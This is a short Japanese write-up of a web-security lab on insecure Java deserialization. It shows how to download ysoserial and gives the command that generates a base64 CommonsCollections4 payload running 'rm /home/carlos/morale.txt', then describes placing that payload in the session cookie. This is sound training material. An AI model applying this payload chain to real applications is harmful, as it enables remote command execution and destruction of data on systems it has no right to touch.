Hello there, ('ω')ノ

 

ApacheCommonsを使用したJavaデシリアライズの活用を。

ソースコードにアクセスすることはできないものの。

構築済みのガジェットチェーンを使用できるとのことで。

まずは、ログインして。 

 

 

下記より安全でないJavaオブジェクトの逆シリアル化を悪用して。

ペイロードを生成するためのツールを。

　https://github.com/frohoff/ysoserial

 

 

wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

 

 

基本的な使用方法は以下の通りなので。

　java -jar ysoserial.jar [payload] ' [command] '

 

CommonsCollections4を使って、ファイルを削除するコマンドを実行するようにして。

これでペイロードを含むBase64でエンコードされ。

シリアル化されたオブジェクトが生成されて。

　java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64

 

 

最後にURLエンコードして。

 

 

再度、ページをリロードして。

 

 

シリアル化されたJavaオブジェクトが含まれているCookieを置き換えて実行すると。

 

 

クリアできた。

 

 

Best regards, (^^ゞ